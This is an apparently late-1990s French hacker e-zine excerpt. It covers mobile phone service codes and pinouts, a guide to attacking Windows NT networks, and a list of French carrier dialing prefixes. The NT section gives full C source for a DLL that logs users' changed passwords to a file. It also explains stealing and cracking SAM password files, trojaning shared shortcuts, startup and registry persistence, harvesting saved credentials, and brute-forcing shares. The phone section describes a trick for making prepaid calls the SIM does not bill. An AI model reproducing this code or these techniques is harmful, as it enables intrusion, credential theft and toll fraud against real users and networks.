Lorsque tout est fait, pressez 'No', et si vous voulez changer quelque chose, pressez
'Yes'.

____________________________
Ericsson GH688, GH788, GH768.

Codes

*#06# pour obtenir le numéro IMEI (International Mobile Equipment Identity)
*#0000# pour remettre le language en Anglais
>*<<*<* pour obtenir les informations internes au téléphone
CXC125065 - Numéro de série
PRG 970715 1515 - Version du logiciel

>*<<*<*> YES vérifier les chaines de texte du téléphone (1)
>*<<*<*>> YES vérifier les chaines de texte du téléphone (n)

Le menu de vérouillage du fournisseur d'accès (Service Provider (SP)) est
utilisé pour vérouiller le téléphone sur la carte SIM de votre SP. Une fois
que le téléphone est vérouillé sur un SP, si vous insérez la carte SIM d'un
SP différent, le téléphone n'acceptera pas la carte.
Le téléphone peut cependant accepter une autre carte SIM du même SP.

Pour activer / désactiver ce verrou, il faut un code special qui n'est pas
disponible à l'utilisateur final ;)

Comment activer le menu de vérouillage SP.

<**< vérouiller le réseau ? si vous appuyez sur YES, vous avez 5 essais
pour entrer NCK.

<**<< vérouiller le sous réseau ? si vous appuyez sur YES, vous avez 5 essais
pour entrer NSCK.

Attention : en faisant ceci, votre téléphone peut se vérouiller sur le réseau
d'un SP.
Si un code invalide est entré 5 fois, le téléphone sort du menu.
Après, le menu de vérouillage ne sera plus accessible. Un dévérouillage par
acces direct dans l'EEPROM sera nécessaire.

Dernière version du logiciel : <970905>

Brochage externe :
1 = + external power supply
2 = RS232 input (TTL)
3 = GND (digital)
4 = RS232 output (TTL)
5 = +5V output
6 = Test
7 = Mute
8 = Internal/external
9 = GND (analogic)
10 = ?
11 = BF in
12 = BF out

Courte description
1: alimentation externe pour charger la batterie.
Cette alimentation branchée sans la présence d'une batterie, ne permettra pas
d'utiliser le téléphone.
Voltage suggéré 7.2V avec 600mA au moins.

2: Entrée ligne série RS232 niveau TTL (0/5V).
Quand le téléphone est allumé, cette broche est à "
0".

3: GND digital

4: Sortie ligne série RS232 niveau TTL (0/5V).
Quand le téléphone est allumé, cette broche est à "
1".

5: Sortie +5V quand le téléphone est allumé.

6: Mode test. En general, est a "
0". Pour basculer en mode test, eteindre le
telephone, mettre la broche a "
1" (+5V), allumer le téléphone. Dans ce mode,
la ligne serie marche à 115200 au lieu de 9600 en mode normal.

7: Mute. Normalement a "
0", passe a "1" durant une conversation.
Pratique pour couper l'autoradio par exemple.

8: Si ouvert, le micro et le haut-parleur internes sont actives. Si a "
0",
ceux en externe seront activés.

9: GND analogic.

10: Cette broche est encore inconnue. Elle parait atenuer le micro et le
haut-parleur lorsqu'elle est a "
0".

11: entrée BF.

12: Sortie BF.

Comment communiquer avec le telephone ? ?
La ligne serie dialogue en mode 9600 n 8 1.
En fait, elle repond aux commandes AIES "
at" mais rien de plus.


Astuces
Raccourci pour le menu des derniers numeros composes :
Ce menu est accessible en pressant la touche YES, mais l'est aussi en
pressant "
0" puis "#".

Lorsque le telephone est eteind, et qu'il n'est pas en chargement, le
niveau de batterie peut etre affiche pendant une periode tres courte en
pressant tres rapidement la touche "
NO". Ainsi l'indicateur de batterie
s'affiche pendant environ 2 secondes.

Nom complet du reseau :
Pour afficher le nom complet du reseau, aller dans le menu "
RESEAUX", et
usiliser "
SELECTION" ou "LISTE" pour afficher les reseaux disponibles.
Ensuite, presser "
*" pour afficher le nom complet du reseau desire.

Pour afficher la liste complete des operateurs acceptes par votre
telephone, aller dans la fonction "
LISTE" du menu "RESEAUX". Losque le
telephone a fini sa recherche, presser "
<" puis deux fois "YES". La liste
complete des operateurs s'affiche. Utiliser "
<" et ">" pour se deplacer
dans la liste.

Appels gratuits :
Ce procede ne semble marcher qu'avec les cartes prepayees, et uniquement
dans certains pays.
La carte prepayee, est une carte SIM qui possede un certain nombre de
credits, tout comme une telecarte normale.
Composer le numéro et presser "
YES". Une fois que le message "CONNECTE"
s'affiche :
Presser "
CLR" puis "0" puis "#" puis deux fois "NO" pour eteindre le telephone.
On peut encore converser au telephone, mais la carte SIM n'enregistre pas
l'appel (selon les pays).
A la fin de l'appel, le seul moyen de remettre le telephone en etat normal,
est de retirer la batterie.

IMEI (International Mobile Equipment Identity):
XXXXXX-XX-XXXXXX-X
TAC FAC SNR SP

TAC = Type Approval Code (first 2 digits = country code of the
approval-country )

FAC = Final Assembly Code (01,02 = AEG)
(10 Nokia)
(41,44 Siemens)
(51 Sony,Siemens,Ericsson)
SNR = Serial Nr.

SP = Spare (always "
0")

__________
Nokia 6110

Pour voir le numero IMEI: *#06#
Pour voir la version du Software: *#0000#
1ere Ligne - Version du Soft
2eme Ligne - Date de sortie du Software
3eme Ligne - Type de cell.
Pour avoir plus d' infos sur le cell (numero de serie): *#92702689#

1er Ecran - Date de fabrication du cell
2eme Ecran - # de Serie, IMEI
3eme Ecran - Date d' achat
4eme Ecran - Derniere date de reparation

*3370# pour avoir une meilleure qualite d' appel
[ce qui diminue la duree de vie de la batterie]
#3370# pour enlever cette option
Note: apres avoir presse ces touches, le cell se reinitialisera avec l' option choisie.

*4720# pour activer une qualite moyenne sur le GSM
[la qualite baisse, mais la duree de la batterie augmente de 30%]
#4720# pour desactiver cette option.

__________
NOKIA 5110

Pour voir le numero d' IMEI: * # 0 6 #
Pour voir la version du soft: * # 0 0 0 0 # Derniere version: V. 4.59 (01-06-98)
Puis vous verrez: la version du soft, sa date de sortie, le type de cell.
Pour avoir + d' infos a propos du cell, entrez: * # 9 2 7 0 2 6 8 9 #
Vous verrez la date de fabrication, le numero de serie, et le numero IMEI,
la derniere date de reparation.
Pour ameliorer la kalite d' appel, et diminuer la vie de la batterie, entrez * 3 3 7 0 #
(pour l' enlever, tapez # 3 3 7 0 #).
Pour diminuer la kalite d' appel et augmenter la duree de vie de la batterie, tapez
* 4 7 2 0 #
(pour l' enlever, tapez # 4 7 2 0 #).
Pour trouver rapidement et composer un numero, pressez <arrow down> puis la premiere
lettre du nom
(pour john, pressez 5).
Pour changer rapidement le profil du cell, pressez <on/off> deux fois rapidement,
en attendant d' avoir le choix du profil, puis maintenez la touche <on/off> enfoncee.

__________
Nokia 3110

Pour voir le numero d' IMEI: * # 0 6 #
Pour voir la version du soft:*#3110#

Par exemple:

V 07.11 Version du Software.
24-09-97 Date de sortie du software.
NHE-8 Type de phone.

La derniere version connue est: V 7.32

Tapez *#92702689# .
Un code va vous etre demande:
6232 (OK) : Montre l' annee et le mois de fabrique.
7332 (OK) : Montre la date de la derniere reparation
7832 (OK) : Montre la date de vente du cell.
9268 (OK) : Montre le numero de serie.
37832 (OK) : Pour etablir la date de vente (a n' utiliser k' une seule fois).
87267 (OK) : Pour confirmer le transfert.
Pour verifier si l' horloge SIM peut etre stoppee: *#746025625#
Pour initailiser la configuration: *#7780#

Pinouts

Desktop Charger----------------------|
| |
| |
CHARGER--| + TOP OF PHONE -
V V 1 2 3 4 5 6 V
(o) | | [= = = = = =] | |
7 8 9 10 11 12


______________________
Nokia 2110i/2110e/9000

IMEI
Pour voir le numero d' IMEI: * # 0 6 #
Pour mettre en marche l' id, entrez *#30#[SEND] . Pour le call-blocking, entrez *#31#[SEND]
Pour permettre de voir les sites de cells, [MENU] 4 9 1
Pour avoir la version du software sur les 2110e / 2110i, entrez *#170602112302#
Pour les versions plus recentes: *#682371158412125#
The phone should display something similar to this:
V 5.31 Version du soft
06-01-96 Date de fabrication
NHE-4 modele GE8 = 9000?

Kelkes raccourcis pour les 2110i !

Entrez : * puis 'Memory' puis 'Find' ou * et la fleche du bas
Resultat : Vous apercevez les appels recus.
Entrez : + puis 'Memory' puis 'Find' ou + et la fleche du bas
Resultat : Vous apercevez les appels mankes.
Pressez 'Menu', puis le bouton 'vert' vous permet de transmettre les codes DTMF.

__________________________________________________________
Motorola d460, 2500, 6200 (Flare), 7500, 8200, 8400 & 8700

*#06# donne l' IMEI pour les 8700, mais pas pour les 6200, 7500, 8200
Pour activer la RBS (Radio Base Station):
('pause' signifie ke la touche * est pressee en attendant ke la fenetre apparaisse)
[pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]
Vous devez maintenant presser [MENU] et naviguer jusk'a la fonction 'Eng Field Options',
et le valider?
Pour desactiver la RBS:
[pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]
Cela ne fonctionnera k' avec certaines versions de softwares.
Utilisation de la RBS:
Distance a la station - Faites un appel. Lorsque ca repond, pressez [MENU] tant
ke 'Eng Field Option' apparait, pressez [OK], selectionnez 'Active Cell', pressez
[OK], pressez [MENU] tant ke 'Time Adv xxx' apparait, xxx etant un numero. Multipliez
ce numero par 550, et le resultat est la distance entre votre cell et la RBS, en metres.

Qualite du signal - pressez [MENU] tant ke 'Eng Field Option' apparait, pressez [OK],
selectionnez 'Active Cell', pressez [OK], pressez [MENU] tant ke 'C1' apparait. C' est
la qualite du signal. Si ca reste negatif pendant plus de 5 secondes, un nouveau cell
est selectionne.

______________
Panasonic G500

Pour voir le numero d' IMEI: * # 0 6 #
PINOUTS
1 - Ground
2 - TX_Audio
3 - Audio_Ground
4 - HF_ON (L=ON) -> L=H/F ON
5 - AOP_Sense <- Selection de l' adaptateur DATA
6 - Serial_Up <- UART up (9600,33.8kbps)
7 - Serial_Down -> UART down
8 - External_Power <- Puissance pour le rechargement
9 - Ground
10 - RX_Audio
11 - Radio_Mute -> L=MUTE
12 - HF_Sense <- L=H/F MODE
13 - Reserved L=FLASH WRITE ENABLE
14 - Ignition <- H=ON
15 - Logic_Power -> H=HANDSET ON
16 - PAON -> Power Amplifier Control Signal

_________________
Philips PR 747/II

Ce sont les memes codes que pour le Nokia 6110

____________
Philips FIZZ

IMEI: *#06#
Lock Code: *#1234#
Pour avoir la version du software, entrez *#8377*#
Le resultat donnera kelke chose du genre:
Version : 0916 - EEPROM : 00000000-00 - TDA : 2445 - KISS : 0502 SIM-LCK
..ou pour d autres versions de soft: *#5644*#
Resultat:
Version : 09162205 - EEPROM : 00000000-00 - TDA : 2445 - KISS : 0502 SIM-LCK
Pinouts pour Fizz et Spark
1 GROUND
2 GROUND
3 HANDS FREE ON/OFF
4 MUTE
5 TX
6 RX
7 RTS
8 REPROGRAMMING
9 ON HOOK CHARGER (a peu pres 13V? a 14V)
10 AUX MIC
11 AUX SPEAKER
12 GROUND

_____________
Philips GENIE

IMEI: *#06#
*#2254*# est le status de l' enregistre: C, BS, RR, MMI, CREAT.
*#2255*# active et desactive le mode "
DEBUG CALL".
*#2558*# affiche le temps en jours, heures et minutes du temps depuis lekel vous etes
connecte au reseau GSM
Pour forcer une reconnection au reseau: *#2562*#
Pour voir et modifier les codes de securite du telephone: *#7489*#
Pour voir des infos sur votre carte SIm, comme le nom: *#7378*#
Pour avoir des infos sur le SIM lock, Init et Flags: *#3377*#
Pour activer et desactiver le sleep mode: *#7693*#
Pour avoir des infos sur le sleep mode: *#8463*#

_____________________
Siemens S1/S3:comfort

MONITOR MODE
Les series Siemens S1/S3 ont un mode moniteur ki peut etre active
directement par le clavier. Pour activer ce mode, vous devez entrer le code
special d' acces programme dans le telephone.
Protocole:
Allumez le telephone
Entrez le code d' acces du PIN, et pressez [OK].
Pressez [Menu].
Pressez [9].
Pressez [8] (ca peut etre le [7] sur certains cells).
Vous devriez voir votre IMEI
Pressez la touche en haut a gauche du menu.
7684666
Touche de raccrochage.

____________________________________
Siemens S4/S4 Power ; Sony CM DX 100

MONITOR MODE
Idem ke pour les S1/S3, sauf k' il faut presser [7] au lieu de [8].
Presser le bouton droit d' affichage lorske vous etes en monitor mode
permet de montrer une liste de 6 cells ayant les plus forts signaux.

Indicateurs du mode Test: (* = seulement dispo lors d' un appel)

CH Numero du canal
RX Force du signal (dB)
N NCC (Color Code)
B BCC (Color Code)
CI Cell ID (en Hex)
C1+ temps avant ke le cell force la connection. (see RX and RXAM)
LAI Location Area Identity. Montre le code Id du reseau (42F010 = 240.01)
et MSC
TXPWR Puissance de transmission (dB)
RXAM Force du signal recu.
TS* Temps de coupure
TA* Distance a la Tour en Km X 2
PL* Niveau de Puissance

Tableau de puissance
PL: 5 6 7 8 9 10 11 12 13 14 15
dB: 33 31 29 27 25 23 21 19 17 15 13
Watts: 2 1.3 .8 .5 .3 .2 .13 .08 .05 .03 .02

LF* C1 valeur avec transmission continue de la Tour
LS* C1 valeur avec transmission discontinue de la Tour
QF* Taux d' erreur avec transmission continue de la Tour
QS* Taux d' erreur avec transmission discontinue de la Tour

Tableau du taux d' erreur (BER= Bit Error Rate)
QF/QS register: 0 1 2 3 4 5 6 7
% of bit sent: 0.2 0.8 0.4 1.6 3.2 6.4 12.8 25.6




(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Windows NT, les bases #1 ) 2.6 ( cyberjunk (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)


From: Cyberjunk [Snipper@Hotmail.com | www.multimania.com/cybjunk]
To: Cryptel E-Zine
Cc: Internet =)

--------------------------------------------------------------------

1. Introduction

2. Les réseaux Windows NT
2.1 Les protocoles

3. Les fichiers SAM.*
3.1 Ou sont-ils ?
3.3 Hack de NT en local
3.2 Comment cracker les mots de passe ?

4. Les commandes NET
4.1 Gestion des utilisateurs
- Net Accounts
- Net Group
- Net Localgroup
- Net User
4.2 Informations systéme
- Net Computer
- Net Config
- Net Config Server
- Net Session
4.3 Ressources réseau
- Net Continue/Pause
- Net File
- Net Share
- Net Start/Stop
- Net Use
- Net View

5. Les chevaux de troie
5.1 FPNWCLNT.DLL
5.2 Les raccourcies (.LNK)
5.3 Ou le mettre pour qu'il se lance au demmarrage ?
5.4 Quelque idées de conception

6. Windows 95/98, Failles de sécurité dans un domaine Windows NT

[ Rem: Cette partie ne traite pas le méthode Netbios ]

6.1 Qui a dit que NetBios était pour les lames ?
6.2 Récupération de données pour une attaque sur NT
6.3 NAT [NetBios Auditing Tool]

7. Fin
--------------------------------------------------------------------




1. Introduction
--------------------------------------------------------------------

Tout d'abord je tiens à préciser que ce texte n'est pas un RIP,
mais il est obligé qu'il ressemble à certain autre vu le nombre d'article
qui parle déjà de NT. A quoi sert -il ? ou A qui est-il destiné alors ?
Déjà, il est en français, et a mon avis il est destiné à ceux qui ont
envi de se mettre à jour. La triste vérité est là ... Windows NT s'impose
dans le monde (impitoyable =) ) des serveurs... Il devrait vous permettre
d'aller un plus loin que le NetBios, ou de comprendre des réseaux Microsoft
dans votre université par exemple ou encore de bien préparer la future
doc de Rhino 9, NT War Doc si vous n'êtes pas familier avec ce systéme.



2. Les réseaux Windows NT
--------------------------------------------------------------------

2.1 Les protocoles

Windows NT commme la pluspart des OS Réseaux, accepte plusieurs protocoles et
les fait fonctionner côte à côte.

------------------+-------------------------------------------------------------
+ NetBios/NetBeui | C'est le plus simple de tous les protocoles. developpé par
| Microsoft, au temps du MsDos. Il comporte moins de 20
| commandes. ( Cf wsnetbs.h etc ... )
------------------+-------------------------------------------------------------
+ NWlink | A partir de NT 3.5x. J'en sais pas plus.
------------------+-------------------------------------------------------------
+ TCP/IP | Je pense que c'est la peine de m'attarder la dessus.
------------------+-------------------------------------------------------------
+ DLC | Le protocole Data Link Control s'appuie sur le standart
| 802.2 et est utilisé entre NT et les calculateurs Mainframes
| ou des composants spécifiques commme les cartes JetDirect(HP)
| ou markVision (LexMark). Tous ca pour dire, que vous risquez
| de le croiser de temps à autre.
------------------+-------------------------------------------------------------
+ IPX/SPX | Réseaux utilisés pour communiquer avec NetWare (Novell)
| sachant que NT n'a pas besoin de novell pour un LAN.
------------------+-------------------------------------------------------------


3. Les fichiers SAM.*
--------------------------------------------------------------------

3.1 Ou sont ils ?

En fait sur un système NT Server, les mots de passe sont enregistrés dans un fichier
appeller Sam, WINNTsystem32ConfigSam. Le problème de celui ce c'est qu'il est
en utilisation permanente par le système. Donc il vous est impossible de l'ouvrir,
et de le copier. Pour remedier a ce probleme, il existe de petit executable qui se
chargeront pour vous de pouvoir vous autoriser a manipuler le fichier cible
(samdump.exe par exemple).
Par contre il faut savoir qu'il existe un autre Sam sur WINNTRepairsam._
Celui-ci est créer a l'installation de windows et contient donc
le password administrateur.

Rem: A l'inverse du premier, il n'est pas en utilisation permanente.
----

Ces fichiers (l'un ou l'autre) deviennet donc la cible d'une attaque
sur NT, car l'important c'est d'avoir l'admin pour des raisons simples,
avoir les droits d'accès totals sur la machines, et bien souvent
sur tout le réseau =) .

3.2 Hack de NT en local

Une technique tres simple consiste a booter avec une disquette dos,
monter la partition NTFS avec 'ntfsdos.exe' et aller chercher le
fichier de mot de passe.
Une autre, basé sur le même principe, peut se faire depuis Linux.
Comme c'est le cas dans mon univ, nous avons Linux/Nt en multiboot.
On peut donc monter la partition Ntfs et aller chercher le fichier.

Rem: Il faut être root pour utiliser la commande mount.
----

3.3 Comment Cracker les mot de passe ?

L0pht (www.l0pht.com) sont auteur d'un tres beau shareware appeller L0phtcrack,
qui permet d'ouvrir un Sam, et de lancer du brute force dessus. Assez pratique
la version actuelle contient même le samdump intégré.
Pour ce qui est du shareware, vous pouvez l'utiliser pendant 1 semaine.
Mais bon, je vou cacherez pas que le crack est dispo sur astalavista =)
Toute fois, il y a aussi un programme en C dispo dans Phrack Issue 50,
www.phrack.com (www.2600.com/phrack). Choisissez votre arme =)


4. Les commandes NET
--------------------------------------------------------------------

Sous NT, pratiquement tout peut se être paramétré en utilisant ces commandes.
L'interêt du paragraphe suivant n'est pas de re-ecrire l'aide ... =)
Mais en fait, de vous faire voir ce qui est a votre portée depuis
une station de travail, comment obtenir des informations sur les utilisateurs
ou mot de passe par exemple ou encore comment faire des manips interessantes par rapport
à la config réseaux (Domaines, Partage etc ....)
L'interet secondaire de ces commandes, est de pouvoir ecrire des script intéressant ... =)
En rapport avec les chevaux de trois !!! Mais vous l'aviez déja compris... j'en suis sûr !

4.1 Gestion des utilisateurs

Net Accounts
============

Si vous taper cette commande sans paramétre vous obtenez les infos

  
relatifs
au mot de passe, durée de validité, nombre de caractéres ...

--------------------------------+---------------------------------------------------------
/FORCELOGOFF:[minutes|NO] | Indique en minute la durée d'une session usr sur le
| serveur. Par défaut epêche une déconnexion forcée.
--------------------------------+---------------------------------------------------------
/MINPWLEN:[longueur] | Taille du mot de passe
--------------------------------+---------------------------------------------------------
/MAXPWAGE:[jour|unlimited] | Durée en jour de la validité des mot de passe
--------------------------------+---------------------------------------------------------
/MINPWAGE:[jours] | Au bout de combien de jour le pass doit etre changer
--------------------------------+---------------------------------------------------------
/UNIQUEPW:[nombre] | Repete le MEME mot de passe. Valeur max 8
--------------------------------+---------------------------------------------------------
/DOMAIN | La commande s'excutera sur le Serveur de domaine et pas
| en local.
--------------------------------+---------------------------------------------------------


Net Group
=========

Affcihe les noms de groupe sur le serveur.

--------------------------------+---------------------------------------------------------
/ADD | Ajoute un groupe
--------------------------------+---------------------------------------------------------
/DELETE | Supprime un groupe
--------------------------------+---------------------------------------------------------
/DOMAIN | La commande s'excutera sur le Serveur de domaine et pas
| en local.
--------------------------------+---------------------------------------------------------


Net Localgroup
==============

Même chose sur la machine locale.

Net User
========

Permet de gérer les comptes utilisateurs sur le serveur.
Même si vous êtes sur un station de travail, cette commmande
n'agit que sur le serveur.

Exemple: net user login_user mot_de_pass [POUR LA SUITE VOIR LES PARAMS SUIVANTS]

--------------------------------+---------------------------------------------------------
/ADD | Ajoute un user
--------------------------------+---------------------------------------------------------
/DELETE | Supprime un user
--------------------------------+---------------------------------------------------------
/DOMAIN | La commande s'excutera sur le Serveur de domaine et pas
| en local.
--------------------------------+---------------------------------------------------------
/ACTIVE:[YES|NO] | Active ou désactive un compte user
--------------------------------+---------------------------------------------------------
/EXPIRES:[date|NEVER] | Faire désactiver un user a une date spécifique
--------------------------------+---------------------------------------------------------
/HOMEDIR:chemin | Chemin du dossier de basede l'usr
--------------------------------+---------------------------------------------------------

4.2 Informations systéme

Net Computer
============

Ajouter un ordinateur dans un domaine.

Exepmle: NET COMPUTER \ip_de_l_ordi [PARAMATRES]

--------------------------------+---------------------------------------------------------
/ADD | Ajoute un ordi
--------------------------------+---------------------------------------------------------
/DEL | Supprime un ordi
--------------------------------+---------------------------------------------------------

Net Config
==========

Renvois des infos d'une machine.

Exemple: NET CONFIG [PARAMETRE]

--------------------------------+---------------------------------------------------------
SERVER | Renvoie des infos sur la config du server
--------------------------------+---------------------------------------------------------
WORKSTATION | idem pour la station de travail
--------------------------------+---------------------------------------------------------

Net Config Server
=================

Permet de configurer de façon particuliére les serveur.

Exemple: NET CONFIG SERVER [PARAMETRE]

--------------------------------+---------------------------------------------------------
/AUTODISCONNECT:m | Durée de la déconnexion automatique si inactivité
--------------------------------+---------------------------------------------------------
/HIDDEN | Permet de cacher un ordi lorsque l'on demande d'afficher
| la liste des serveurs.
--------------------------------+---------------------------------------------------------

Net Session
===========

Appelle et termine les sessions d'un ordi du réseaux.

Exemple: NET SESSION \ip_ordi [PARAMETRE]

--------------------------------+---------------------------------------------------------
/DELETE | Termine la connexion sur un autre ordi
--------------------------------+---------------------------------------------------------

4.3 Ressources réseau

Net Continue/Pause
==================

Suspend ou active un service.

Exemple: NET PAUSE/CONTINUE [service]

Net File
========

Disponible que sur les serveurs, cette commande permet de ferme les fichiers partagé et
Sans option elle renvoi la liste des fichiers ouverts sur le serveur avec leurs numéro.

Exemple: NET FILE [numéro|/DELETE]

--------------------------------+---------------------------------------------------------
/CLOSE | Ferme le fichier
--------------------------------+---------------------------------------------------------

Net Share
=========

La commande NET SHARE permet de consulter et de modifier les partages d'un serveur.
Sans option, elle renvoient des informations sur les ressources partagées.

Exemple: NET SHARE nom_de_partage=chemin [PARAMETRES]

--------------------------------+---------------------------------------------------------
/USERS:nombre | Nbe de user ouvant y aller en même temps
--------------------------------+---------------------------------------------------------
/DELETE | Arrette le partage
--------------------------------+---------------------------------------------------------

Net Start
=========

Arrette ou demarre un service.

Exemple: NET START/STOP [service]

Net Use
=======

Elle permet de se connecter a un ordianteur distant.
Sans option elle renvoie la liste des ressources partagées d'un ordinateu avce
quelques bien spécifique.

Exemple: NET USE \Ip_de_l_ordi [mot_de_passe] [PARAMETRES]

--------------------------------+---------------------------------------------------------
/USER user | Nom de l'utilisateur avec lequel la connexion sera
| établie (login...)
--------------------------------+---------------------------------------------------------
/HOME | Relie l'utilisateur a son dossier d'origine (HOME ...)
--------------------------------+---------------------------------------------------------
/DELETE | Terminer une connexion
--------------------------------+---------------------------------------------------------
/PERSISTENT [YES|NO] | Rétablir a la prochaine ouverture ?
--------------------------------+---------------------------------------------------------

Net View
========

Affcihe les ressources partagées.

Exemple: NET VIEW \ip-de_l_ordi

5. Les chevaux de troie
--------------------------------------------------------------------

5.1 FPNWCLNT.DLL
[Trouver dans le MHD de Rhino9 ]

Cette Dll permet d'obtenir des noms d'utilisateurs et des mots de passe si le
répertoire WinNTSystem32 est en mode Lecture et Ecriture. Le résultat est
mis dans un fchier sur emp.
Pour ma part je n'ai jammais trouver de tel systéme pour l'instant mais voila
quand même la source .. Au cas ou v êtes plus chanceux que moi. :)

------------- cut --------------
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

struct UNI_STRING {
USHORT len;
USHORT maxlen;
WCHAR *buff;
};

static HANDLE fh;

BOOLEAN __stdcall InitializeChangeNotify ()
{
DWORD wrote;
fh = CreateFile("C:\temp\pwdchange.out", GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
0);
WriteFile(fh, "InitializeChangeNotify started
"
, 31, &wrote, 0);
return TRUE;
}

LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,
struct UNI_STRING *passwd)
{
DWORD wrote;
WCHAR wbuf[200];
char buf[512];
char buf1[200];
DWORD len;

memcpy(wbuf, user->buff, user->len);
len = user->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "User = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

memcpy(wbuf, passwd->buff, passwd->len);
len = passwd->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "Password = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

sprintf(buf, "RID = %x
"
, rid);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

return 0L;
}
------------- cut --------------


4.2 Les raccourcies (.LNK)

Le grand interêt de ces fichiers c'est que si vous pouvez les modifer et glisser
un de vos gentils script à l'interieur. Je m'explique =)

Vous avez chez vous préparé un .Bat (Ou un .Reg) en jouant avec les commandes NET,
qui Partage le repertoire de celui qui l'execute.
Admettons, que sur le bureau commun aux utilisateurs traine un wordpad.lnk.
Si vous avez les droits, rien ne vous empêche de lancer un script
qui partagera le repertoire HOME de l'utilisateur et qui apres qui lance wordpad.
Une autre application, pourait ce passer sur serveur partagé ou tout le monde
met ce qu'il veut. Assez fréquent dans les universités pour mettre en comun
des ressources. Il Pourrait trainer par la un Pussy.lnk ..
ou vous pourriez modifer les raccourcis Microsoft Office...
Enfin bref, de toute façon je vous je vous fais confiance pour trouver
ce qu'il faut, et de toute façon ca depend extremement du server.
Il n'y pas de régle en général, sauf peut-être que le TEMP est tres souvent
en accés complet pour tous les utilsateurs.

5.3 Ou le mettre pour qu'il se lance au démmarage ?

Pour faire exécuter une commande au démarrage vous avez le choix
entre le menu démarrer ou la base de registre.

Les répertoire suivant corresponde au Menu Démmarrer :

- C:WinNTProfilesDefault UserStart MenuProgramsStartUp ~ US
- C:WinNTProfilesDefault UserMenu DémarrerProgrammesDémarrage ~ FR

Sinon vous pouvez aussi le placer dans la base de registre:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]

Faites, Ajouter Châines, Puis taper le chemin de votre Script.

5.4 Quelques idées deconception:

Grâce au commande NET, vous pouvez donc pratiquement configurer
ou reconfiguer tous les paramétres réseaux et donc par
conséquences obtenir pratiquement ce que vous voulez d'un
utilisateur.

Points intéressants:
---------------------

N'oubliez pas que si vous n'avez pas les droits
pour aller dans des répertoires clé du systéme, certain eux l'ont,
arrangé vous donc qu'il lance votre script et qu'il facent ce que vous vouliez
ou carrement qu'il vous donne les droits =)

Un autre exepmle serait de faire ajouter un Super-utilsateur qui
disparaitra au bout de 1 jour par exepmle.

Je vous conseille vraiment d'installer WinNT et de tester vos programmes en Local.

6. Windows 95/98, Failles de sécurité dans un domaine Windows NT
--------------------------------------------------------------------

Cette parti ne re-explique pas la methode NetBios mais à pour
objectif de vous montrer quelques techniques d'attaques sur un
serveur NT, en passant par des machines 95 ou 98 accéssible NetBios.

6.1 Qui a dit que NetBios était pour les lames ?

Je tiens a rappeller pour ce qui avait déja mis NetBios au placard,
peuvent ressortir leur attirail. Malgres le fait que ce procédé
soit tres connus par la pluspart d'entre vous, je vous garantie qu'il
marche encore tres bien (Surtout chez les petits ISP locaux),
et c'est parfois un faille dans un réseau NT pourtant sécurisé.


6.2 Récupération de données pour une attaque sur NT

Notre objectif reste toujours un serveur NT. Sur la machine 95, ramassez tout
ce qui tourne autour des utilisateurs.

- .pwl ~ Mot de passe de login sous 95, forte chance pour
que ce soit les meme que pour NT. [CRYPTE]
- ws_ftp.ini ~ Contient des mots de passe sauvgardés sur accés FTP. [CRYPTE]
- pmail.ini ~ Contient des mots de passe de messagerie,
par fois c'est le même que le password de login. [CRYPTE]

- eudora.ini ~ Idem [CRYPTE]
- mirc.ini ~ regarder la configuration du proxy. [CLAIR]
- etc ...

Une fois des mots de passe trouvés, cela vous constitue un bon petit
dicotionnaire pour NAT.

6.3 NAT [NetBios Auditing Tool]

Je pense que la majorité d'entre vous le connaissent déjà mais je tenniat à le rappeller.
Ce petit utilitaire, permet de faire du brut force sur des ressources partagé.
Son instalaltion est simple, un fichier contenant les noms d'utilisateurs et
l'autres les mots de passes.

NAT.EXE Disponible sur Technotronic.
Interface graphique, Disponible sur Rhino9.

7. Fin
--------------------------------------------------------------------

Bon voilà c’est fini ...
Bonne chance à tous ! Le savoir n’est pas un crime ni les travaux pratiques.

* Special msg: La paranoïa nous sauvera ...

Have Phun !



(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Prefixes nationaux ) 2.7 ( vatoo (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)



Depuis le debut de l' annee, il est possible d' acceder aux operateurs
prives grace a des prefixes.
Il en existe deux types. Le premier, a un chiffre (dit " E "), est a composer
a la place du 0 et a faire suivre des neuf chiffres habituels
(a l' international, E0 au lieu de 00). A noter le cas particulier
du 0, qui correspond a l' operateur de boucle locale auquel l' utilisateur
est raccorde. Dans la plupart des cas, c' est malheureusement FT
(pour l' instant ;). Dans de rares cas, ca peut etre Cegetel, Worldcom ou
Colt pour un client directement relie a leur boucle optik, et FT est alors
accessible par le 8.
Le second type de prefixe est compose de 4 chiffres (du type 16XY), a
composer avant les 10 chiffres habituels ( a l' international, 16XY00 au lieu
de 00). Les prefixes sont utilisables pour les appels hors du departement
Longue Distance. Ils ne sont pas utilisables depuis les cabines, vers les
mobiles, vers les numeros speciaux ( 3BPQ et 08). C' est encore France Telecom
qui s' y oppose, meme pour 1999.

Liste des prefixes:

Prefixe | Operateur
---------------|--------------------------
2 | SIRIS
4 | TELETEL
5 | OMNICOM
6 | ESPRIT TELECOM
7 | CEGETEL
8 | FRANCE TELECOM
9 | 9 TELECOM
1601 | PROSODIE
1610 | TELEGLOBE
1611 | GEOLINK
